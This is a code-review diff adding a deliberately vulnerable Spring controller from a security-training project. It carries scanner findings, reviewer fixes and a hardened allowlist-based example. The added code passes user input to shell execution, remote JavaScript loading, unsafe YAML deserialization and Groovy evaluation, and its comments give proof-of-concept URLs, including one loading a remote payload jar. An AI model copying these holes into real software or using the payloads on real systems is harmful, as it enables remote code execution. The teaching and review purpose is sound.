138 changes: 138 additions & 0 deletions src/main/java/org/joychou/controller/Rce2.java
@@ -0,0 +1,138 @@
package org.joychou.controller;

import groovy.lang.GroovyShell;
import lombok.extern.slf4j.Slf4j;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

import javax.script.Bindings;
import javax.script.ScriptContext;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.InputStreamReader;


/**
* Java code execute
*
* @author JoyChou @ 2018-05-24
*/
@Slf4j
@RestController
@RequestMapping("/rce")
public class Rce {

@GetMapping("/runtime/exec")
public String CommandExec(String cmd) {
Runtime run = Runtime.getRuntime();
StringBuilder sb = new StringBuilder();

try {
Process p = run.exec(cmd);

Code scanning / SonarCloud, check failure: OS commands should not be vulnerable to command injection attacks. Change this code to not construct the OS command from user-controlled data. See more on SonarQube Cloud: https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEIx5GaQdYdx2B2UD&open=AZWiEIx5GaQdYdx2B2UD&pullRequest=3
BufferedInputStream in = new BufferedInputStream(p.getInputStream());
BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
String tmpStr;

while ((tmpStr = inBr.readLine()) != null) {
sb.append(tmpStr);
}

if (p.waitFor() != 0) {
if (p.exitValue() == 1)
return "Command exec failed!!";
}

inBr.close();
in.close();
} catch (Exception e) {
return e.toString();
}
return sb.toString();
}
Comment on lines +30 to +56
⚠️ Potential issue

High-risk OS command injection (Runtime.exec)
The user input cmd is passed straight to Runtime.exec(), which may let an attacker execute arbitrary commands. Validate the input strictly or remove this feature, and where it is genuinely needed use a safer alternative (for example a predefined command allowlist).

The following example shows how to refuse to execute input that comes directly from the user:

 public String CommandExec(String cmd) {
-    Process p = run.exec(cmd);
+    // TODO: 强制使用安全设计,禁止直接执行用户命令
+    throw new UnsupportedOperationException("禁止传入任意命令执行。请先进行安全改造。");
}





/**
* <a href="http://localhost:8080/rce/ProcessBuilder?cmd=whoami">POC</a>
*/
@GetMapping("/ProcessBuilder")
public String processBuilder(String cmd) {

StringBuilder sb = new StringBuilder();

try {
String[] arrCmd = {"/bin/sh", "-c", cmd};
ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);

Code scanning / SonarCloud, check failure: OS commands should not be vulnerable to command injection attacks. Change this code to not construct the OS command from user-controlled data. See more on SonarQube Cloud: https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEIx5GaQdYdx2B2UC&open=AZWiEIx5GaQdYdx2B2UC&pullRequest=3
Process p = processBuilder.start();
BufferedInputStream in = new BufferedInputStream(p.getInputStream());
BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
String tmpStr;

while ((tmpStr = inBr.readLine()) != null) {
sb.append(tmpStr);
}
} catch (Exception e) {
return e.toString();
}

return sb.toString();
}
Comment on lines +63 to +83
⚠️ Potential issue

The same high-risk OS command injection exists here (ProcessBuilder)
As with Runtime.exec, ProcessBuilder here uses the user-supplied command string cmd directly. If an attacker can control this parameter, arbitrary command execution is possible. Avoid assembling commands from unvalidated external input.

One way to handle it:

 String[] arrCmd = {"/bin/sh", "-c", cmd};
-ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);
+// TODO: 禁止使用未校验的用户输入进行命令执行
+throw new UnsupportedOperationException("禁止传入任意命令执行。请先进行安全改造。");




/**
* http://localhost:8080/rce/jscmd?jsurl=http://xx.yy/zz.js
*
* curl http://xx.yy/zz.js
* var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("open -a Calculator");}
*
* @param jsurl js url
*/
@GetMapping("/jscmd")
public void jsEngine(String jsurl) throws Exception{
// js nashorn javascript ecmascript
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
String cmd = String.format("load(\"%s\")", jsurl);
engine.eval(cmd, bindings);

Code scanning / SonarCloud, check failure: Dynamic code execution should not be vulnerable to injection attacks. Change this code to not dynamically execute code influenced by user-controlled data. See more on SonarQube Cloud: https://sonarcloud.io/project/issues?id=cccfeng_java-sec-code&issues=AZWiEIx5GaQdYdx2B2UE&open=AZWiEIx5GaQdYdx2B2UE&pullRequest=3
}
Comment on lines +95 to +101
⚠️ Potential issue

Dynamically executing JS scripts is a serious security hazard
The jsEngine method loads and executes JavaScript from an external URL, which gives an attacker a path to remote arbitrary code execution. Review the business requirement thoroughly; unless it is essential, do not allow external scripts to be loaded and executed directly.

If there is a genuine need to run trusted scripts, use signature verification or a strict allowlist:

 String cmd = String.format("load(\"%s\")", jsurl);
-engine.eval(cmd, bindings);
+throw new UnsupportedOperationException("禁止直接加载外部JS,需改用安全方案或白名单。");


/**
* http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]]
* yaml-payload.jar: https://github.com/artsploit/yaml-payload
*
* @param content payloads
*/
@GetMapping("/vuln/yarm")
public void yarm(String content) {
Yaml y = new Yaml();
y.load(content);
}
Comment on lines +111 to +114
⚠️ Potential issue

Loading YAML through an unsafe constructor may lead to arbitrary code execution
Loading uncontrolled content with new Yaml() can trigger deserialization vulnerabilities or other arbitrary code execution (especially in older versions of org.yaml.snakeyaml). If complex data structures must be parsed, enable stricter restrictions or use SafeConstructor and further tighten the type allowlist.


@GetMapping("/sec/yarm")
public void secYarm(String content) {
Yaml y = new Yaml(new SafeConstructor());
y.load(content);
}

/**
* http://localhost:8080/rce/groovy?content="open -a Calculator".execute()
* @param content groovy shell
*/
@GetMapping("groovy")
public void groovyshell(String content) {
GroovyShell groovyShell = new GroovyShell();
groovyShell.evaluate(content);
}
Comment on lines +127 to +130
⚠️ Potential issue

Dynamic execution of Groovy scripts carries remote code execution risk
GroovyShell can execute arbitrary custom scripts. If the user controls content, this is a high-risk RCE. Restrict the scripts strictly according to the actual requirement, or consider removing this feature.




public static void main(String[] args) throws Exception{
Runtime.getRuntime().exec("touch /tmp/x");
}
}
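Review bot: the file added is `Rce2.java` but the hunk declares `public class Rce`; a public top-level class must match its file name, so this does not compile as submitted. Rename the class to `Rce2`, and give it a `@RequestMapping` other than `/rce` if that prefix is already served by another controller, since Spring rejects ambiguous handler mappings at startup. Two smaller points in the same hunk: in `CommandExec` the early `return "Command exec failed!!";` after `waitFor()` skips `inBr.close()` and `in.close()` (put the reader in a try-with-resources), and `@GetMapping("groovy")` is the only mapping in the file without a leading slash. The trailing `main` that runs `touch /tmp/x` is a local smoke test and should not ship inside a controller.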
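The review comments above recommend a predefined command allowlist for the Runtime.exec and ProcessBuilder handlers, and SafeConstructor with a tightened type allowlist for the YAML handler. The controller below is an added example, not code from java-sec-code or its author, showing both recommendations as working Spring handlers. The class name RceHardened, the /rce/sec routes, the command keys, the /bin/ping flags and the 64 KiB / 5 second limits are assumptions made for the example.

```java
package org.joychou.controller;

import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;

/**
 * Added example, not part of java-sec-code. Hardened counterparts to the
 * /rce endpoints reviewed above; class name and routes are hypothetical.
 */
@RestController
@RequestMapping("/rce/sec")
public class RceHardened {

    /** Allowlist: the caller picks a key, the argv is fixed server-side (assumed paths). */
    private static final Map<String, List<String>> COMMANDS;
    static {
        Map<String, List<String>> m = new HashMap<>();
        m.put("whoami", Arrays.asList("/usr/bin/whoami"));
        m.put("uptime", Arrays.asList("/usr/bin/uptime"));
        COMMANDS = Collections.unmodifiableMap(m);
    }

    /** Host name or IPv4 literal; no leading '-' so ping cannot read it as an option. */
    private static final Pattern HOST = Pattern.compile("^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$");

    /** /rce/sec/exec?name=whoami : no command string ever comes from the user. */
    @GetMapping("/exec")
    public String exec(String name) throws IOException, InterruptedException {
        List<String> argv = COMMANDS.get(name);
        return argv == null ? "unknown command" : run(argv);
    }

    /**
     * /rce/sec/ping?host=127.0.0.1 : when user data must reach a process, check its
     * shape and pass it as its own argv element. No shell is involved, so ";", "|",
     * "`" and "$( )" would be ordinary characters (and the pattern rejects them anyway).
     */
    @GetMapping("/ping")
    public String ping(String host) throws IOException, InterruptedException {
        if (host == null || !HOST.matcher(host).matches()) {
            return "invalid host";
        }
        return run(Arrays.asList("/bin/ping", "-c", "1", host));
    }

    /** Starts argv directly (no /bin/sh -c), merges stderr, bounds output size and runtime. */
    private static String run(List<String> argv) throws IOException, InterruptedException {
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        // Drain the pipe before waiting so a chatty child cannot deadlock on a full buffer.
        try (InputStream in = p.getInputStream()) {
            byte[] chunk = new byte[4096];
            int n;
            while (out.size() < 64 * 1024 && (n = in.read(chunk)) != -1) {
                out.write(chunk, 0, n);
            }
        }
        if (!p.waitFor(5, TimeUnit.SECONDS)) {
            p.destroyForcibly();
            return "command timed out";
        }
        return "exit=" + p.exitValue() + "\n" + new String(out.toByteArray(), StandardCharsets.UTF_8);
    }

    /**
     * /rce/sec/yaml?content=... : SafeConstructor builds only standard YAML types, so a
     * "!!javax.script.ScriptEngineManager [...]" tag fails with a ConstructorException
     * instead of instantiating the class. The shape check after it is the "type allowlist"
     * the review asks for: only a flat mapping of string keys to scalars is accepted.
     * (SnakeYAML 1.x constructor, as in the file above; 2.x requires a LoaderOptions argument.)
     */
    @GetMapping("/yaml")
    public String yaml(String content) {
        if (content == null || content.length() > 4096) {
            return "invalid yaml";
        }
        Object parsed = new Yaml(new SafeConstructor()).load(content);
        if (!(parsed instanceof Map)) {
            return "expected a mapping";
        }
        for (Map.Entry<?, ?> e : ((Map<?, ?>) parsed).entrySet()) {
            Object v = e.getValue();
            boolean scalar = v == null || v instanceof String || v instanceof Number || v instanceof Boolean;
            if (!(e.getKey() instanceof String) || !scalar) {
                return "unexpected value for key " + e.getKey();
            }
        }
        return String.valueOf(parsed);
    }
}
```

Both command handlers go through run(), so user data never becomes part of a command string and nothing is ever handed to a shell; the output cap and the five second kill are there because a handler that blocks forever on a child process is its own denial of service. The YAML shape check is what turns "parsed without an exception" into "parsed into exactly what this endpoint expects".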